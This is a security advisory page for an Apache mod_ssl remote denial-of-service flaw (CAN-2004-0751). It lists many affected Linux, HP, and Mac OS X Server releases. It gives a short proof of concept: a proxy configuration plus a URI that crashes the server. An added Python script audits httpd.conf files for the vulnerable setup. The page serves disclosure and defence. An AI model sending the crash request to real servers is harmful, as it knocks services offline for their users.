

Title Apache mod_ssl Remote Denial of Service Vulnerability
Published 2004-09-10-12:00AM
Updated 2005-01-13-05:33PM
Class Failure to Handle Exceptional Conditions
CVE   CAN-2004-0751
Remote  Yes
Local  No
Credit  Discovery is credited to M. "Alex" Hankins <lxhankins002@fastmail.fm>.
Vulnerable  Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Home
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux AS 3
RedHat Desktop 3.0
MandrakeSoft Linux Mandrake 10.0 amd64
MandrakeSoft Linux Mandrake 10.0
MandrakeSoft Linux Mandrake 9.2 amd64
MandrakeSoft Linux Mandrake 9.2
HP Tru64 UNIX Compaq Secure Web Server 6.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP Tru64 UNIX Compaq Secure Web Server 5.1 A
HP Tru64 UNIX Compaq Secure Web Server 5.1
HP Tru64 UNIX Compaq Secure Web Server 5.0 A
HP Tru64 UNIX Compaq Secure Web Server 4.0 G
HP Tru64 UNIX Compaq Secure Web Server 4.0 F
HP HPUX B.11.23
HP HPUX B.11.22
HP HPUX B.11.11
HP HPUX B.11.00
Gentoo Linux 1.4
Conectiva Linux 10.0
Conectiva Linux 9.0
Apache Software Foundation Apache 2.0.50
MandrakeSoft Linux Mandrake 10.1
MandrakeSoft Linux Mandrake 10.1 x86_64
Apache Software Foundation Apache 2.0.47
Apple Mac OS X Server 10.1
Apple Mac OS X Server 10.1.1
Apple Mac OS X Server 10.1.2
Apple Mac OS X Server 10.1.3
Apple Mac OS X Server 10.1.4
Apple Mac OS X Server 10.1.5
Apple Mac OS X Server 10.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.8
Apple Mac OS X Server 10.3
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.5
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
Not Vulnerable  HP Tru64 UNIX Compaq Secure Web Server 6.3.2 a
Apache Software Foundation Apache 2.0.51
RedHat Fedora Core1
Code   No exploit is required.

The following proof of concept is available:

With the following configuration in httpd.conf:

    Listen 47290
    SSLProxyEngine on
    RewriteEngine on
    RewriteRule /(.*) https://www.example.com/$1 [P]

The server may be crashed by issuing the following URI:

    http://www.example.com:47290/eRoomASP/CookieTest.asp?facility=facility&URL=%2FeRoom%2FFacility%2FRoom%2F0_4242
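A configuration audit for the pattern shown above, as an added example that is not part of the original advisory: it flags an httpd.conf that enables SSLProxyEngine and proxies requests to an https:// backend on a 2.0.x build older than 2.0.51. Assumptions: the function names are hypothetical, the file is treated as one scope (virtual hosts are not separated), every 2.0.x release below 2.0.51 is treated as affected although the page names only 2.0.47 and 2.0.50, ProxyPass is included as a generalization of the RewriteRule [P] case, and vendor packages with a backported fix are not recognized.

```python
import re

FIXED = (2, 0, 51)  # Apache release the advisory lists as not vulnerable

def directives(conf_text):
    """Yield (lowercased name, argument string) for each httpd.conf directive."""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#<":   # skip comments and <Section> tags
            continue
        parts = line.split(None, 1)
        yield parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")

def https_proxy_rules(conf_text):
    """Return the directives that proxy to an https:// backend, or [] when
    SSLProxyEngine is not switched on anywhere in the file."""
    ssl_on, rules = False, []
    for name, args in directives(conf_text):
        if name == "sslproxyengine" and args.lower() == "on":
            ssl_on = True
        elif name == "rewriterule":       # RewriteRule pattern substitution [flags]
            m = re.match(r"\S+\s+(\S+)\s+\[([^\]]*)\]", args)
            flags = {f.strip().upper() for f in m.group(2).split(",")} if m else set()
            if m and m.group(1).lower().startswith("https://") and flags & {"P", "PROXY"}:
                rules.append("RewriteRule " + args)
        elif name == "proxypass" and re.search(r"\shttps://", args, re.I):
            rules.append("ProxyPass " + args)  # generalization beyond the page's PoC
    return rules if ssl_on else []

def needs_upgrade(conf_text, server_version):
    """True when the proxy-to-HTTPS pattern is present and the server version
    string (e.g. "Apache/2.0.50") is a 2.0.x release older than FIXED."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", server_version)
    if not m:
        return False
    version = tuple(int(x) for x in m.groups())
    return bool(https_proxy_rules(conf_text)) and (2, 0, 0) <= version < FIXED

# Constructed sample: the configuration quoted in the advisory.
SAMPLE_CONF = """\
Listen 47290
SSLProxyEngine on
RewriteEngine on
RewriteRule /(.*) https://www.example.com/$1 [P]
"""

if __name__ == "__main__":
    print(https_proxy_rules(SAMPLE_CONF), needs_upgrade(SAMPLE_CONF, "Apache/2.0.50"))
```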
Copyright 2007, SecurityDot